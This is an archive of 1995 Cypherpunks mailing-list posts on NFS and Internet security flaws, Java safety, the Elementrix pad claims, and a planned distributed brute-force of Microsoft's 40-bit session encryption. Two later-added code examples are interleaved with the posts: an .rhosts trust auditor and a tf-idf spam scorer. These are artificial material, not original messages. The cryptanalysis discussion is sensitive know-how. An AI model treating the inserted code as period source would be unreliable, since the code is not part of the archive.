     and other like-minded experts, the company announced a contest today 
     called Netscape Bugs Bounty
     [snip]"
     
     On October 11, 1995, Joan E. Rigdon of the Wall Street Journal writes: 
     "The software industry is starting to sweep the bugs out of the closet 
     [snip]
     ... Netscape is trying to systematically tap the intelligence of the 
     hackers instead of randomly waiting for them to find mistakes.
     [snip]"
     
     Both of these stories bring out not only the flaws in the Internet and 
     software to use the Internet, but also the work going on both at the 
     software developers as well as that by groups such as ours that are 
     active in identifying the risks.
     
     Congratulations to the Cypherpunks
     
     Martin G. Diehl





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: patrick@Verity.COM (Patrick Horgan)
Date: Wed, 11 Oct 95 09:08:17 PDT
To: kelli@zeus.towson.edu
Subject: Re: NYT on Internet Flaws
Message-ID: <9510111604.AA06660@cantina.verity.com>
MIME-Version: 1.0
Content-Type: text/plain


> From: "K. M. Ellis" <kelli@zeus.towson.edu>
> 
> This one is _really ripe_ for a response to the editor.  Ideas?
> 
> We could start something off-list if there are several interested in 
> co-authoring.
> 
I'd love to see something in there about most commercial sites being behind
firewalls without nfs access across the firewall.  This greatly reduces the
risk from the nfs problems.  If you get your binary via nfs from a trusted
host inaccessible from the internet, then if you have this problem management
can handle it as an employee problem;)  There are ways to make secure
firewalls, it's fairly well understood.  Sometimes people point to things
like the hack Mitnick did last Christmas, but his attack took advantage of
a couple of things a security expert shouldn't have allowed, first and
foremost two machines were accessible from the internet, and one of them
trusted root logins from the other without a password:(

I could write something up about it if you'd like.

Patrick
   _______________________________________________________________________
  /  These opinions are mine, and not Verity's (except by coincidence;).  \
 |                                                       (\                |
 |  Patrick J. Horgan         Verity Inc.                 \\    Have       |
 |  patrick@verity.com        1550 Plymouth Street         \\  _ Sword     | 
 |  Phone : (415)960-7600     Mountain View                 \\/    Will    | 
 |  FAX   : (415)960-7750     California 94303             _/\\     Travel | 
  \___________________________________________________________\)__________/
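
One way to audit for the passwordless root trust described in the message above, as an added example that is not part of the original post. It assumes the trust is expressed in BSD r-command files (hosts.equiv / .rhosts), which the message does not name; the hostnames, file contents and the audit_trust helper are constructed for illustration.

```python
"""Audit r-command trust entries for passwordless-login exposure.

Added illustration. Format handled: one "host [user]" entry per line,
"+" as a wildcard, "+@name" for a netgroup, a leading "-" for a denial.
All hostnames and file contents below are constructed.
"""

SEVERITY_ORDER = {"review": 0, "high": 1, "critical": 2}


def audit_trust(owner, text, internet_facing):
    """Return one finding per positive trust entry in a file owned by `owner`.

    internet_facing is the auditor's own list of hosts reachable from
    outside the firewall (an input assumption, e.g. taken from firewall rules).
    """
    findings = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split()
        host = fields[0]
        user = fields[1] if len(fields) > 1 else None
        # Explicit denials grant nothing, so they are not findings.
        if host.startswith("-") or (user is not None and user.startswith("-")):
            continue

        # Every positive entry is a passwordless login grant: baseline "review".
        reasons = [("review", "passwordless login granted to %s" % host)]
        if host == "+":
            reasons.append(("critical", "any host is trusted"))
        elif host.startswith("+@"):
            reasons.append(("review", "netgroup %s must be expanded and re-checked" % host[2:]))
        if user == "+":
            reasons.append(("critical", "any remote user is accepted"))
        if owner == "root":
            reasons.append(("high", "root login accepted without a password"))
        if host.lower() in internet_facing:
            reasons.append(("high", "trusted peer is reachable from the Internet"))

        severity = max((sev for sev, _ in reasons), key=SEVERITY_ORDER.get)
        findings.append({
            "line": lineno,
            "entry": line,
            "severity": severity,
            "reasons": [msg for _, msg in reasons],
        })
    return findings


# Constructed sample: root's .rhosts on one of two Internet-reachable machines.
SAMPLE_ROOT_RHOSTS = "\n".join([
    "# constructed sample of root's .rhosts",
    "gw1.example.com",
    "+ +",
    "-oldhost.example.com",
    "backup.internal.example root",
])
INTERNET_FACING = {"gw1.example.com", "gw2.example.com"}

if __name__ == "__main__":
    for f in audit_trust("root", SAMPLE_ROOT_RHOSTS, INTERNET_FACING):
        print("%-8s line %d: %-30s %s" % (
            f["severity"], f["line"], f["entry"], "; ".join(f["reasons"])))
```
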




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Wed, 11 Oct 95 06:12:40 PDT
To: shamrock@netcom.com (Lucky Green)
Subject: Re: Netscape & Fortessa
In-Reply-To: <199510110427.AAA05498@book.hks.net>
Message-ID: <199510111312.JAA14704@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Lucky Green writes:
> Yes, it might, because of the strong support by vendors for voluntary GAK
> or no crypto at all. Let me explain. There are a number of indicators that
> show that strong crypto is losing in the global marketplace. Example: the
> charter of the new IETF Internet Payment Systems working group requires
> that the use of crypto be limited. In the discussion about the charter,
> the near unanimous consent (with myself as the sole dissenter) was that
> crypto may only be used for authentication, not confidentiality.

I wasn't aware of that -- I believe that this may have happened
because those of us who cared didn't attend the zoo in Stockholm. The
meeting was a complete joke, with the Microsoft people and others
making it clear that they didn't intend to follow the process. Many of
us who cared decided to do better things with our time instead of
showing up in the aptly named Weapons room for the second session.

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Wed, 11 Oct 95 06:19:04 PDT
To: Ray Cromwell <rjc@clark.net>
Subject: Re: java security concerns
In-Reply-To: <199510110550.BAA02068@clark.net>
Message-ID: <199510111318.JAA14723@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Ray Cromwell writes:
>    I agree, however I would point out that not all postscript interpreters
> are emasculated (especially those on unix systems like IRIX, they contain
> all kinds of calls to fork(), read()/open(), etc).

Many postscript interpreters are a serious security threat. However, I
found it fairly easy to chop enough of the code out for the one I run
that I feel safe with it -- the exercise wasn't that hard.

> Nothing in the Java spec tells you that you must call fork() in a
> Java interpreter implementation. In fact, Java has nothing to do
> with the GUI calls, the network calls, etc. You can support as much
> or as little system I/O in a Java implementation as you want.

Yes, but in practice, to support the given applets that Netscape will
be browsing you have to open the kimono a bit too much overall. With
sufficient emasculation, I believe Java could be made safe, but then
it wouldn't be the Java that Sun and Netscape are pushing any more.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: madden@mpi-sb.mpg.de (Peter Madden) (by way of Duncan Frissell <madden@mpi-sb.mpg.de>)
Date: Wed, 11 Oct 95 06:36:13 PDT
To: cypherpunks@toad.com
Subject: Re: [NOISE] was Re: java security concerns
Message-ID: <199510111335.JAA17959@panix.com>
MIME-Version: 1.0
Content-Type: text/plain



> Rather than trying to prove a program to be correct (which I agree is doomed
> to failure for the foreseeable future for all but trivial programs)


I disagree: automatic program verification has come along in leaps and
bounds, largely due to the current research impetus in safety critical
systems. Various sorting programs, bin-packing programs, to mention
but a few, have all been successfully auto. verified (and these are
non-trivial programs, which form the building-blocks of even less
trivial "industrial-sized" programs).  Indeed, the technology has been
extrapolated to the automatic verification of electronic circuits,
compilers, schedule problems and computer configurations (all w.r.t. a
user's specification). The real problems lie with specifying the
program/problem correctly in the first place (so-called specifications
capture), and with automatic program *synthesis* from specifications
(which, in mathematical theorem proving terms, presents the problem of
creating existential objects, as opposed to just verifying that they
do the right job).

 I do, however, agree with the need/desire for a greater diversity of
program properties which can be automatically checked. 


Regards,

Peter

=================================================================

Dr Peter Madden,                                Email: madden@mpi-sb.mpg.de
Max-Planck-Institut fuer Informatik,            Phone: (49) (681) 302-5434
Im Stadtwald, W-66123 Saarbruecken, Germany.       Fax: (49) (681) 302-5401

=================================================================







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: madden@mpi-sb.mpg.de (Peter Madden) (by way of Duncan Frissell <madden@mpi-sb.mpg.de>)
Date: Wed, 11 Oct 95 06:36:15 PDT
To: cypherpunks@toad.com
Subject: Re: [NOISE] was Re: java security concerns
Message-ID: <199510111336.JAA17969@panix.com>
MIME-Version: 1.0
Content-Type: text/plain



> Did you also send this post to cypherpunks@toad.com?

No I didn't -- wasn't sure if that's where F. Stuart's email
originated from. Please feel free to circulate to the universe, along
with some further clarification below.



 I hope I wasn't too positive in my support
of auto. program verification. There are real problems. However, with
the development of the field called formal methods, computation
has been directly linked to mathematical logic, which is a much
better understood, and well circumscribed, domain than programming
languages per se.
 
 Applications of formal methods in software engineering depend
critically on the use of automated theorem provers to provide improved
support for the development of safety critical systems.  Potentially
catastrophic consequences can derive from the failure of computerized
systems upon which human lives rely such as medical diagnostic
systems, air traffic control systems and defence systems (the recent
failure of the computerized system controlling the London Ambulance
Service provides an example of how serious software failure can be).
Formal methods are used to provide programs with, or prove that
programs have, certain properties: a program may be proved to
terminate; two programs may be proved equivalent; an inefficient
program may be transformed into an equivalent efficient program; a
program may be verified to satisfy some specification (i.e. a program
is proved to compute the specified function/relation); and a program
may be synthesized that satisfies some specification.

 Program Verification boils down to proving a mathematical conjecture
specifying that a given program will, for all inputs of a certain
type, generate outputs of a certain type.  This is relatively
straightforward -- we already have the program P described in the
initial conjecture to be proved.


Program synthesis, on the other hand, starts with a similar
conjecture *except* that P remains an unidentified variable.
The task of synthesis (auto. or otherwise) is to incrementally identify
P as the conjecture proof is unraveled. This requires all kinds
of "intelligent", and often intuitive,  choices during the proof, and
is consequently a difficult process to automate.

Peter

=================================================================

Dr Peter Madden,                                Email: madden@mpi-sb.mpg.de
Max-Planck-Institut fuer Informatik,            Phone: (49) (681) 302-5434
Im Stadtwald, W-66123 Saarbruecken, Germany.       Fax: (49) (681) 302-5401

=================================================================







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anon-remailer@utopia.hacktic.nl (Anonymous)
Date: Wed, 11 Oct 95 01:55:32 PDT
To: cypherpunks@toad.com
Subject: MITM evasionMITM evasion
Message-ID: <199510110855.JAA17966@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


Two years ago, I pointed out that getting a single message past
the man in the middle isn't good enough; you have to convince your
readers that the key they received on one channel is more accurate
than the key they're receiving on all the other channels.
But if they'll believe that, they may also believe the man in the middle's
announcement that the key in your name on all the keyservers is
wrong, and the correct key is the one he's putting out.
Can't win either way, but it's still important to get the key out.

My current key is 0x54696D4D; the fingerprint is 
4D 65 44 75 53 61 21 2F   41 73 55 64 85 6D 21 7F.

..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,
tcmay@sensemedia.net   | anonymous networks, digital pseudonyms, zero
408-728-0152           | knowledge, reputations, information markets,
Corralitos, CA         | black markets, collapse of governments.
Higher Power: 2^756839 | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andy Brown <asb@nexor.co.uk>
Date: Wed, 11 Oct 95 02:08:46 PDT
To: Piete Brooks <Piete.Brooks@computer-lab.cambridge.ac.uk>
Subject: Re: Hal's Third Challenge?
In-Reply-To: <"swan.cl.cam.:012510:951010200606"@cl.cam.ac.uk>
Message-ID: <Pine.SOL.3.91.951011094131.1754D-100000@eagle.nexor.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 10 Oct 1995, Piete Brooks wrote:

> It seems that microsoft was the one to go for, as they too use 40 bit for
> each session ....  If someone can generate the CRACKing code and someone can
> donate an example, I'd be DELIGHTED to arrange another BRUTE !

If you mean STT, they're using a hotch-potch of methods in the exportable 
version.  40 bit RC4 protects the purchase order form and receipt, single 
DES-CBC protects the financial data and they claim that direct RSA 
protects the credit card numbers although this is far from clear from the 
specification (can someone clarify this?).

So you're going to need brutedes and/or some network factoring code (the 
smallest modulus they use is 512 bits which, realistically we do not have 
a chance of attacking in a reasonable time).


Regards,

- Andy

+-------------------------------------------------------------------------+
| Andrew Brown  Internet <asb@nexor.co.uk>  Telephone +44 115 952 0585    |
| PGP (2048/9611055D): 69 AA EF 72 80 7A 63 3A  C0 1F 9F 66 64 02 4C 88   |
+-------------------------------------------------------------------------+




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Gillogly <jim@acm.org>
Date: Wed, 11 Oct 95 10:08:35 PDT
To: cypherpunks@toad.com
Subject: Re: Elementrix POTP
In-Reply-To: <199510102120.RAA110954@tequesta.gate.net>
Message-ID: <199510111708.KAA09582@mycroft.rand.org>
MIME-Version: 1.0
Content-Type: text/plain



> liberty@gate.net (Jim Ray) writes:
> Sorry to continue "beating a dead horse" here, but I forwarded a few
> C-punks' messages regarding the Elementrix "Power One-Time Pad" to
> this person, and I thought you might be interested in her (somewhat
> cryptic <g>) response.

Actually, no, and I'll tell you why.  My only interest in this product
is that you're flogging it as a one time pad, and just calling something
a one time pad doesn't make it so.  From all that's been exposed so far,
it looks like it doesn't match the standard definition of a one time pad
in standard cryptologic works.  Maybe it's something <like> it, and maybe
not -- but if they're saying it <is> a one time pad they should be
prepared to prove it.  Reading their warmed-over press releases doesn't
interest me at all.

Except for one thing, i.e. this line from the last blather:

>The encryption is not done by using an encryption algorithm.

'Nuff said for now, I think.

	Jim Gillogly
	Mersday, 20 Winterfilth S.R. 1995, 17:05




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark <mark@lochard.com.au>
Date: Tue, 10 Oct 95 20:02:13 PDT
To: jim@acm.org
Subject: Re: Hal's Third Challenge?
In-Reply-To: <199510102043.NAA06895@mycroft.rand.org>
Message-ID: <199510102312.AA37668@junkers.lochard.com.au>
MIME-Version: 1.0
Content-Type: text


>I'd rather see a Microsoft challenge than a third Netscape 40-bitter.
>We've made our point about 40-bit keys on Netscape's skull enough times,
>and Microsoft is making smug product announcements referring to those
>Netscape breaks.
>
>Time to spread our joy around a bit, I'd say.

Indeed. With the huge amount of people that dislike m$ I think we will at
least double the amount of persons wanting to do their bit to rub their
noses in it.  What's needed is someone to reverse engineer a m$ transfer,
according to the published specs, isolate the encrypted section and then
produce a brute engine which can be ported to the platforms we want to try.

For the person that cracks a session using the brute force program in the
next brutefest and provides the key, I will give a US$50 international money
order to. I'm sure others will pile t-shirts on you as well.

IMHO we owe Netscape some counter pr against m$, we've proved our point to
Netscape and they performed admirably by being open and responsible to the
net.community. Whilst it didn't seem to dent their share value, they did cop
some bad press (and some media weenies still think their product is broken)
because of the group's efforts. What goads me is m$ trying to use this in
their press dealing and acting like this is entirely different from their
situation. Seems to me they need it proved to them that because of their
proprietary attitude they are in a worse position. In short bring them down
to earth and serve their ego to them on a plate.

Cheers,
Mark
mark@lochard.com.au
The above opinions are rumoured to be mine.



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Wed, 11 Oct 95 07:15:01 PDT
To: mlm@skyrr.is (Magnus Logi Magnusson)
Subject: Re: Hal's Third Challenge?
Message-ID: <199510111414.KAA27374@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:45 PM 10/11/95 +0000, Magnus Logi Magnusson wrote:
>I'm interested too... if there is a 32 bit client for NT/Win95 (or a single
>threaded one for Win32s) capable of reporting automatic to the
>server/local server, I could probably throw in c.a. 40-50 pentiums and a
>lot more 486 (and a few HP/Sun/Alpha) :-)  Anyone working on self-reporting
>win32 client?
>

Try:

http://www.brute.cl.cam.ac.uk/ftp/pub/brute/w32clnt.zip

DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Wed, 11 Oct 95 07:18:23 PDT
To: Piete Brooks <Piete.Brooks@cl.cam.ac.uk>
Subject: Re: Hal's Third Challenge?
Message-ID: <199510111417.KAA27865@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:05 PM 10/10/95 +0100, Piete Brooks wrote:
>It seems that microsoft was the one to go for, as they too use 40 bit for
>each session ....  If someone can generate the CRACKing code and someone can
>donate an example, I'd be DELIGHTED to arrange another BRUTE !

Could you at least run a server that's not doing anything so that those of
us who want to install and test our clients can at least see if they work
and go into "sleep" mode?

DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Herb Sutter <herbs@interlog.com>
Date: Wed, 11 Oct 95 07:10:52 PDT
To: cypherpunks@toad.com
Subject: Re: Basic Flaws in Internet Security and Commerce
Message-ID: <199510111410.KAA06465@gold.interlog.com>
MIME-Version: 1.0
Content-Type: text/plain


At 21:33 1995.10.10 -0700, Patrick Horgan wrote:
>Paul said:
>
>> A fine piece of work.  The ideas expressed in this paper should scare
>> the hell out of everyone who uses NFS for any serious applications,
>> which for a fact includes most banks and all investment banks and
>> brokerage houses.  In this particular area I KNOW what is at risk.
>> Again, I congratulate the authors on a first-class effort.
>
>I agree, it's a good job of publicizing these holes, but (not to take
>anything away from these guys, I'm sure they know this), these are not
>newly found holes.  These attacks on NFS have been known and exploited
>for years and are well known within the security community.

To repeat a comment I made in sci.crypt... the described hole applies
equally well to a program (virus or other) that sits on a workstation and
intercepts calls to OS file services.  This is particularly pernicious on
platforms like PCs, but are there any platforms that don't have this
potential flaw?  The main question, in my mind, is: How can a user know he
is even running the app he thinks he's running?  Once you have an attacker
who can intercept OS file system calls, it seems to me you can know
-nothing-... checksums are no use, signatures are no use, nothing is any use
at that point -- including keeping your authent software on a floppy,
write-protected or not, since it can simply be patched as it's read in, or
the system may just execute a different program altogether.  In fact, if
it's properly done, there may not be any way to even detect that the system
has in fact been subverted.

So: If you can't trust your path to your own file system, what can you
trust?  (And this is without even talking about things like firmware
upgrades and BIOS patches and all sorts of other potential approaches.)  Can
we do no better than simply assume the local workstation file system can be
trusted?

Herb

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Herb Sutter                 2228 Urwin, Suite 102       voice (416) 618-0184
Connected Object Solutions  Oakville ON Canada L6L 2T2    fax (905) 847-6019





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jonathan Litt <littlitt@MIT.EDU>
Date: Wed, 11 Oct 95 07:20:27 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: spam detector algorithm?
In-Reply-To: <199510110303.XAA12811@thor.cs.umass.edu>
Message-ID: <199510111420.KAA00919@hazelwood.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain



  futplex@pseudonym.com writes:
   > Subject: Re: spam detector algorithm?
   > Date: Tue, 10 Oct 1995 23:03:45 -0400 (EDT)
   >
   > Greg Broiles writes:
   > [many details elided...]
   >> Any thoughts about this? Interesting? Stupid? Like I said, my
   >> math is weak.  My intention is to try to cobble up a 2d version
   >> of this to see how it runs but I thought I'd see if anyone can
   >> point out why it can't work, or if it's useful enough that
   >> someone with a better math background than I've got wants to
   >> take this idea somewhere better.
   >
   > It sounds like you are liable to start reinventing parts of the
   > field of information retrieval. The automatic construction and
   > comparison of vectors of document parameters, as you suggested in
   > the part I omitted, is one approach that has met with some
   > success. (The common problem is, given a set of query attributes
   > or a model document, to find relevant documents matching the
   > query or similar to the model document. A variety of relevance
   > measures has been considered.)
   >
   > I can't give you any specific pointers, but I advise you to check out 
   > existing implementations of these and other techniques for information
   > retrieval before you spend too much time writing new code.

Check out SMART, which was originally developed by Gerard Salton at
Cornell. (He is one of the pioneers of IR.) The current release is
maintained by Chris Buckley (chrisb@balder.chrisb.com). Check out:

ftp://ftp.cs.cornell.edu/pub/smart

If you don't feel like installing the whole thing but are interested
in testing it out on some spam, then I could run some tests for you.

Here are some literary references for SMART:

@article{SB88-weight,
   author = {Gerard Salton and Chris Buckley},
   journal = ipm,
   number = {5},
   pages = {513-523},
   title = {Term-Weighting Approaches in Automatic Text Retrieval},
   volume = {24},
   year = {1988}
}

@inproceedings{BSA-trec1,
        author = {Chris~Buckley and Gerard~Salton and James~Allan},
        title = {Automatic Retrieval With Locality Information
                        Using {SMART}},
        booktitle = {Proceedings of the First Text
                        REtrieval Conference (TREC-1)},
        editor = {D. K. Harman},
        publisher = {NIST Special Publication 500-207},
        month = {March},
        year = {1993},
        pages = {59--72}
}

-jon
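
The vector comparison discussed in this thread (find documents similar to a model document), as an added example that is not part of the original messages and is not SMART's code. It uses tf-idf term weights with cosine normalization, the family of schemes studied in the Salton and Buckley paper cited above; the smoothing constants, the 0.5 threshold, the function names and all sample messages are this example's own constructed assumptions.

```python
"""Flag messages that resemble a known spam posting (vector-space model)."""
import math
import re
from collections import Counter

TOKEN = re.compile(r"[a-z0-9$']+")


def tokenize(text):
    return TOKEN.findall(text.lower())


def build_idf(docs):
    """Smoothed inverse document frequency: ln((1 + N) / (1 + df)) + 1."""
    n = len(docs)
    df = Counter()
    for doc in docs:
        df.update(set(tokenize(doc)))
    return {t: math.log((1 + n) / (1 + c)) + 1.0 for t, c in df.items()}, n


def vectorize(text, idf, n_docs):
    """Unit-length tf-idf vector; tf is damped as 1 + ln(tf)."""
    tf = Counter(tokenize(text))
    unseen = math.log(1 + n_docs) + 1.0  # idf for a term with df = 0
    vec = {t: (1.0 + math.log(c)) * idf.get(t, unseen) for t, c in tf.items()}
    norm = math.sqrt(sum(w * w for w in vec.values()))
    return {t: w / norm for t, w in vec.items()} if norm else {}


def cosine(a, b):
    """Dot product of two unit vectors stored as sparse dicts."""
    if len(a) > len(b):
        a, b = b, a
    return sum(w * b.get(t, 0.0) for t, w in a.items())


def flag_similar(model, messages, background, threshold=0.5):
    """Return [(index, score)] for messages at least `threshold` similar
    to the model document, most similar first."""
    idf, n = build_idf(background + [model])
    model_vec = vectorize(model, idf, n)
    scored = [(cosine(model_vec, vectorize(m, idf, n)), i)
              for i, m in enumerate(messages)]
    return [(i, round(s, 3)) for s, i in sorted(scored, reverse=True)
            if s >= threshold]


# --- Constructed sample data -------------------------------------------
MODEL_SPAM = ("MAKE MONEY FAST! Send $5 to each of the five names on this "
              "list, then add your own name at the bottom and repost this "
              "letter to ten newsgroups.")

BACKGROUND = [  # ordinary list traffic, used only for document frequencies
    "Does anyone have patches that let the viewer display an encrypted "
    "image without decrypting it first?",
    "The smallest modulus they use is 512 bits, so a brute force search "
    "on the 40 bit session key is the realistic attack.",
    "There will be a hearing on the patent at the court next month and "
    "it is open to the public.",
    "Automatic program verification proves that a program meets its "
    "specification for all inputs.",
]

INCOMING = [
    # 0: legitimate, shares only common words with the model
    "Does anyone know which remailers on the list support PGP? I want to "
    "chain three of them.",
    # 1: light rewording of the spam
    "Make money fast!! Just send $5 to each of the five names on the list, "
    "add your own name at the bottom, and repost the letter to ten "
    "newsgroups.",
    # 2: legitimate look-alike ("five names", "list")
    "The five names on the program committee were announced at the "
    "meeting; the list is on the web server.",
    # 3: heavier rewording of the spam
    "FAST MONEY: mail five dollars to each name on this list, put your "
    "name at the bottom, repost to ten newsgroups.",
]

if __name__ == "__main__":
    for index, score in flag_similar(MODEL_SPAM, INCOMING, BACKGROUND):
        print("message %d resembles the model spam (cosine %.3f)"
              % (index, score))
```

The look-alike at index 2 stays well under the threshold because its distinctive terms are absent from the model, while both rewordings keep enough of the model's rare terms to score high.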




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: liberty@gate.net (Jim Ray)
Date: Wed, 11 Oct 95 07:40:23 PDT
To: Kari Laine <buster@klaine.pp.fi>
Subject: Re: Elementrix POTP
Message-ID: <199510111433.KAA46776@tequesta.gate.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I forwarded:

>> Unfortunately, and we really mean unfortunately, we can only reveal what 
>>"it is" to people who agree to a non-disclosure arrangement while we're 
>>patent pending. Otherwise we would have no problem revealing the whole 
>>method. So far, every international expert who has reviewed the method 
>>agrees (after many, many hours and days of trying to find holes) that POTP 
>>really does what we say it does.

and Kari asked:

>Maybe you could name those experts who have inspected it - thanks.

Um, in an earlier post she mentioned the venerable Mr. Kahn and
someone else whose name I forget. I think I suggested (for cypherpunk
credibility) Carl, Wei, and maybe (for the "paranoid") Perry, but
I think she just wants to take her chances with us. I suggested
also PRZ, as this would maybe help his legal fund. :) Surprisingly,
she seemed unaware of any particular NSA interest in the prod.
I assured her that they were interested, and we agreed that since
the main office of the company was in Israel there was nothing to
do on this end. She did not respond to my nosy questions about
Israel govt. ownership, or ownership period. I suppose my own
combination of nosiness, crypto relative-cluelessness, and
insistence on my own use of PGP until something's provably better
<g> was beginning to annoy her, so she said, "Go tell them this!"
to get me out of her hair. I'm still curious about how her
technology claims to do its thing, but that's why I hang with
the C-punks (at least, one reason!). ;) "We" (not me) will
(eventually) get a copy and either rake it over the coals (likely,
IMO) or "endorse" it by failing to find a weakness (not so likely,
IMO). Sorry I can't say more, but I don't know more.
JMR


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Freedom isn't Freeh

iQCVAwUBMHvVXG1lp8bpvW01AQGwnAQAjk1+LFBuWaq5xovZySk43wNRKSviS57V
JTZCQVyFugsNTUQYaYP/h2UZ4hcCtJe0aePgENm5B2tBibp9MuP0skNG9m4v+O8A
cG5vei2TDMy7vh5tNWSnDdJ5dEjttGOU/nCEGC6JpDLvfdLICRrp7KdeCIY1bhc3
Up616khae4A=
=NTqn
-----END PGP SIGNATURE-----
Regards, Jim Ray

Ray's Corollary to Murphy's Law:
"You will be spared _NOTHING_." -- Peter C. Ray [my dad].
-----------------------------------------------------------------------
PGP key Fingerprint  51 5D A2 C3 92 2C 56 BE  53 2D 9C A1 B3 50 C9 C8 
Key id. #  E9BD6D35  James Milton Ray   <liberty@gate.net>  IANAL
-----------------------------------------------------------------------
Help Phil! email zldf@clark.net or see http://www.netresponse.com/zldf
_______________________________________________________________________




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Berger <dvberger@eit.COM>
Date: Wed, 11 Oct 95 10:35:22 PDT
To: John Young <jya@pipeline.com>
Subject: Re: NYT on Internet Flaws
Message-ID: <199510111743.KAA20982@viper.eit.com>
MIME-Version: 1.0
Content-Type: text/plain


Just read through the stack of news this was based on (comp.security.e

At 05:39 AM 10/11/95 -0400, John Young wrote:
>   The New York Times, October 11, 1995, pp. A1, D3.
>
>   [Page One]
>
>   Discovery of Internet Flaws Is Setback for On-Line Trade
>
>   By John Markoff
>
>
>   San Francisco, Oct. 10 -- Newly publicized weaknesses in
>   the basic structure of the Internet indicate that the
>   worldwide computer network may need a time-consuming
>   redesign before it can be safely used as a commercial
>   medium.
>
>   The flaws could allow an eavesdropper or criminal to divert
>   many types of documents or software programs traveling over
>   the Internet, examine or copy or alter them, and then pass
>   them on to the intended recipient -- who would have no easy
>   way of knowing that the files had been waylaid. Not only
>   could electronic mail be read in transit or credit card
>   numbers be copied en route, but special security techniques
>   meant to protect such transactions could be dismantled
>   without the user's knowledge.
>
>   That such security flaws exist is not surprising in a
>   system designed originally as a scientific experiment. But
>   the recent rush to the Internet by companies seeking to
>   exploit its commercial possibilities has obscured the fact
>   that giving the system a new purpose has unearthed
>   fundamental problems that could well put off true
>   commercial viability for years.
>
>   "Companies would have you believe this is a trivial
>   problem," said Eric Brewer, a professor of computer science
>   at the University of California at Berkeley. "But now there
>   is a financial incentive to exploit these flaws and to do
>   it secretly."
>
>   The problems were described in a posting that researchers
>   at the university made on Monday to several on-line
>   discussion groups. While the discussion groups are intended
>   for computer security experts, they are potentially
>   accessible to millions of Internet users -- including
>   break-in artists, who are known to monitor such discussion
>   groups for tips on new ways to crack computer systems.
>
>   The researchers who described the Internet weaknesses
>   include two Berkeley computer science graduate students who
>   noted a security weakness in a popular Netscape
>   Communications Corporation software program last month.
>   Then as now, the students' stated motivation in publicizing
>   the problems was to underscore vulnerabilities facing all
>   companies and customers wishing to use the Internet for
>   commerce.
>
>   When the Netscape problems were disclosed last month, the
>   company said the security flaws would be corrected in the
>   next version of its software, which users would be able to
>   download at no charge from Netscape's Internet site. But
>   the newly publicized flaws in the Internet itself indicate
>   that even if a user downloaded a copy of the new, improved
>   Netscape program, a criminal could tamper with the copy
>   along the way and make it unsafe for use in credit card
>   transactions.
>
>   The problem is not Netscape's alone; it potentially affects
>   any organization that operates a computer from which files
>   or software could be downloaded over the Internet. The
>   weakness can be traced to the technical underpinnings of
>   the network, which was set up more than a quarter-century
>   ago not as a medium for conducting business but as a way
>   for academic and scientific researchers to exchange
>   information.
>
>   The disclosure of the flaws casts doubt on the aspirations
>   of companies like Netscape, which last summer had one of
>   the most successful stock offerings in Wall Street history
>   based on the promise of the impending arrival of a
>   full-fledged on-line marketplace.
>
>   "Companies should take a step back and think about this a
>   little more," said Ian Goldberg, one of the Berkeley
>   students. "If it takes a bit longer but comes out more
>   secure, we will all be better off in the long run."
>
>   The way many Internet systems are set up -- especially the
>   Internet's increasingly popular World Wide Web service in
>   which software images and even video and audio clips can be
>   easily downloaded -- information is stored on a computer
>   called a file server and then transferred to a user's
>   computer when it is needed.
>
>   The newly publicized weakness occurs in a widely used
>   Internet protocol -- or technical standard -- known as the
>   Network File System, or NFS. Because NFS does not have any
>   means for allowing the recipient of a program or document
>   to verify that it has not been altered during transmission
>   from the file server to the user, any interception or
>   tampering would go undetected.
>
>   "The Internet protocols have been insecure since day one,"
>   said Jeffrey I. Schiller, the manager of computer networks
>   at the Massachusetts Institute of Technology and director
>   of an industry task force that is trying to design a new
>   secure version of the Internet.
>
>   But the group's timetable is uncertain, and even when it
>   does have recommendations ready, Mr. Schiller is not
>   optimistic that the industry will be willing to devote the
>   time and money to put them into effect.
>
>   He said that many technologies already exist for improving
>   commercial security on the Internet, but many of them
>   require too much technical sophistication on the part of
>   computer users. He criticized makers of hardware and
>   software for not moving more quickly to make easy-to-use
>   security features a built-in part of the technology used on
>   the Internet.
>
>   "The people who should be the leaders in offering security
>   have been too busy counting their money to build these
>   features in to their products," Mr. Schiller said.
>
>   Some commercial Internet merchants have tended to play down
>   the potential for harm from an illegal interception of
>   credit card information over the Internet. They point out
